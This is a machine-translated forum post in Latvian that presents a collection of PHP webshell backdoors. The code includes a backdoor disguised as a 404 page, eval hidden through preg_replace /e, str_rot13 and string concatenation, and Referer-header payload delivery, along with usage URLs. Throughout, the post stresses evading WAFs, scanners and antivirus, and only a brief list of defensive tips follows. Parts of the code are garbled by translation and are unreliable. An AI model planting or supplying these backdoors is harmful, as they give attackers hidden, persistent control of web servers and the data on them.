Mēs izturamies pret šīm PHP aizmugures programmām ar mācīšanās mentalitāti, un daudz PHP aizmugures koda ļauj mums redzēt, cik labi nodomāti ir programmētāji.
Jaudīgas PHP aizmugurējās durvis vienā teikumā
Šāda veida aizmugures ļauj vietnēm,Servera administratori ir ļoti apgrūtinoši, un bieži vien viņiem ir jāmaina metodes, lai veiktu dažādas atklāšanas, un daudzas jaunas rakstīšanas metodes nevar atklāt un risināt ar parastajām noteikšanas metodēm.
Šodien mēs saskaitīsim dažus interesantus PHP Trojas zirgus.
1. Paslēpt PHP ponijus, izmantojot 404 lapas:
[mw_shl_code=php,true] <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//LV"> <html><head> <title>404 Nav atrasts</title> </head><body> <h1>Nav atrasts</h1> <p>Pieprasītais URL šajā serverī netika atrasts.</p> </body></html> <?php @preg_replace("/[lapas kļūda]/e",$_POST['kļūda'],"saft"); header('HTTP/1.1 404 nav atrasts'); ?>[/mw_shl_code]
404 lapa ir bieži izmantots fails vietnē, un daži cilvēki to pārbaudīs un modificēs pēc tam, kad tas ir vispārēji ieteicams, tāpēc mēs varam to izmantot, lai paslēptu aizmugurējās durvis.
2. Bez funkcijām slēpts PHP vienā teikumā:
[mw_shl_code=php,true]<?php session_start (); $_POST['kods'] && $_SESSION['kods'] = trim($_POST['kods']); $_SESSION['theCode']&&preg_replace('\'a\'eis','e'.' v’.‘ a’.‘ l’.‘ (base64_decode($_SESSION[\'theCode\']))','a'); ?>[/mw_shl_code]
Piešķiriet $_POST['kods'] $_SESSION['kods'] un pēc tam izpildiet $_SESSION['kods'], uzsverot, ka nav paraksta koda.
Ja koda pārbaudei izmantojat skenēšanas rīku, tas netrauksies un nesasniegs mērķi.
3. Super slepenas PHP aizmugurējās durvis:
[mw_shl_code=php,true]<?php $_GET[a]($_GET);?> [/mw_shl_code]
Funkcija GET vien veido Trojas zirgu;
Kā lietot:
[mw_shl_code=php,true] ?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28P[/mw_shl_code]
Pēc izpildes pašreizējais direktorijs ģenerē c.php teikumu Trojas zirgs, kad parametrs A ir eval, kļūda Trojas zirgs neizdevās, un, kad tas tiek apgalvots, tas arī ziņos par kļūdu, bet tas radīs Trojas zirgu, ko nevar novērtēt par zemu.
Līmeņa pieprasījums, kods, lai palaistu PHP aizmugurējās durvis:
Šī metode tiek īstenota ar diviem failiem, fails 1
[mw_shl_code=php,true]<?php
//1.php header('Satura tips:teksts/html; rakstzīmju kopa=utf-8′); parse_str($_SERVER['HTTP_REFERER'], $a); if(reset($a) == '10'&& count($a) == 9) { eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
} ?>[/mw_shl_code]
2. dokuments
[mw_shl_code=php,true]<?php
//2.php header('Satura tips:teksts/html; rakstzīmju kopa=utf-8′);
//要执行的代码 $code= <<<KODS phpinfo(); KODS;
//进行base64编码 $code= base64_encode($code);
//构造referer字符串 $referer= "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url $url= 'http://localhost/test1/1.php'; $ch = curl_init(); $options= masīvs( CURLOPT_URL = > $url, CURLOPT_HEADER => NEPATIESS, CURLOPT_RETURNTRANSFER => PATIESS, CURLOPT_REFERER => $referer ); curl_setopt_array($ch, $options); echocurl_exec $ch. punkts; ?>[/mw_shl_code]
Palaidiet base64 kodēto kodu, izmantojot HTTP pieprasījuma HTTP_REFERER, lai panāktu aizmugures efektu.
Ir labi izmantot šo ideju, lai apietu waf.
4.PHP aizmugurējo durvju ģeneratora rīks weevely
weevely ir PHP specifisksWebshell bezmaksas programmatūru, var izmantot, lai simulētu savienojuma apvalku, kas līdzīgs telnet, Weevely parasti tiek izmantots tīmekļa programmu izmantošanai, slēpt aizmugurējās durvis vai izmantot telnet-līdzīgas metodes, nevis tīmekļa lapu pārvaldību, servera puses PHP kods, ko ģenerē Weevely, ir kodēts base64, tāpēc tas var maldināt galveno antivīrusu programmatūru un IDS, Kad esat augšupielādējis servera puses kodu, parasti to var palaist tieši caur Weevely.
Aizmugurējās durvīs izmantotās funkcijas parasti tiek izmantotas virknes apstrādes funkcijas, un tādas funkcijas kā eval un sistēma, kas tiek izmantotas kā pārbaudes kārtulas, neparādīsies tieši kodā, lai aizmugurējo durvju fails varētu apiet aizmugures meklēšanas rīka pārbaudi. Skenēšana ar tumšās grupas tīmekļa aizmugures durvju noteikšanas rīku parāda, ka fails nav apdraudēts.
Iepriekš minētais ir vispārīgs ievads, un attiecīgās lietošanas metodes šeit nav ieviestas, vienkārša zinātnes popularizēšana.
4. Trīs deformēti viena teikuma PHP Trojas zirgi Pirmais:
[mw_shl_code=php,true]<?php ($_=@$_GET[2]).@$_($_POST[1])?> [/mw_shl_code]
Otrais
[mw_shl_code=php,true]<?php $_=“”; $_[+“”]=”; $_=“$_”.“”; $_=($_[+“”]|“ ”). ($_[+“”]|“”). ($_[+“”]^“”); ?> <?php ${'_'.$_}['_'](${'_'.$_}['__']);?>[/mw_shl_code]
Ierakstiet http://site/2.php?_=assert&__=eval($_POST['pass']) paroli virtuves nazis ir caurlaide.
Ja izmantojat virtuves naža papildu datus, tas ir vairāk paslēpts, vai arī varat izmantot citus injekcijas rīkus, jo tas ir iesniegts pēc tam.
Trešais
[mw_shl_code=php,true] ($b 4dboy= $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').' ($b 4dboy)', 'pievienot'); [/mw_shl_code]
str_rot13 ("riny") ir kodēts eval, kas pilnībā izvairās no atslēgvārdiem, nezaudējot efektu, liekot cilvēkiem vemt asinis!
5. Visbeidzot, uzskaitiet dažas uzlabotas PHP Trojas zirgu aizmugurējās durvis:
1、
[mw_shl_code=php,true]$hh= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”; $hh("/[discuz]/e",$_POST['h'],"Piekļuve"); [/mw_shl_code]
//菜刀一句话
2、
[mw_shl_code=php,true]$filename=$_GET['xbid']; ietver($filename); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行
3、
[mw_shl_code=php,true]$reg="c"." o”.“ p”.“ y”; $reg($_FILES[MansFails][tmp_name],$_FILES[MansFails][nosaukums]); [/mw_shl_code]
//重命名任何文件
4、
[mw_shl_code=php,true]$gzid= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”; $gzid("/[discuz]/e",$_POST['h'],"Piekļuve"); [/mw_shl_code]
//菜刀一句话
5、
[mw_shl_code=php,true]include($uid); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行,POST [mw_shl_code=php,true]www.xxx.com/index.php?uid=/home/www/bbs/image.gif [/mw_shl_code]
//gif插一句话
Rezumējot, šīs PHP aizmugurējās durvis var raksturot kā pilnīgas, ja neesat uzmanīgs, jūs noteikti tiksiet apmānīts, un kāda ir mūsu raksta galvenā prioritāte šodien? Galvenie punkti ir zemāk esošajā kopsavilkumā!
Kā rīkoties ar PHP viena teikuma aizmugurējām durvīm: Mēs uzsveram dažus galvenos punktus, un, ja jūs lasāt šo rakstu, es uzskatu, ka jūs neesat nespeciālists, tāpēc es nebūšu ilgstošs:
- Esiet informēts par drošību, rakstot PHP programmas
- Servera žurnālfaili ir bieži jālasa un jādublē
- Stingra atļauju piešķiršana katrai vietnei
- Biežas dinamisko failu un direktoriju partijas drošības pārbaudes
- Uzziniet, kā veikt manuālu antivīrusu "Uzvedības sprieduma izmeklēšana un nogalināšana"
- Sekojiet līdzi vai iefiltrējieties aktīvā kiberdrošības nometnē
- Pat funkciju var izmantot kā noteikumu servera vides hierarhiskai apstrādei
Mēs uzskatām, ka, ja ir vairāk vietņu un liels datu apjoms, mums vajadzētu saprātīgi izmantot dažus palīgrīkus, bet mums nevajadzētu pilnībā paļauties uz šiem rīkiem, tehnoloģijas vienmēr tiek atjauninātas un uzlabotas, vissvarīgākais ir tas, ka jums vajadzētu iemācīties un saprast domāšanu par šo spēcīgo aizmugures cilvēku rakstīšanu, un lomu transponēšana var dot jums lielāku progresu.
|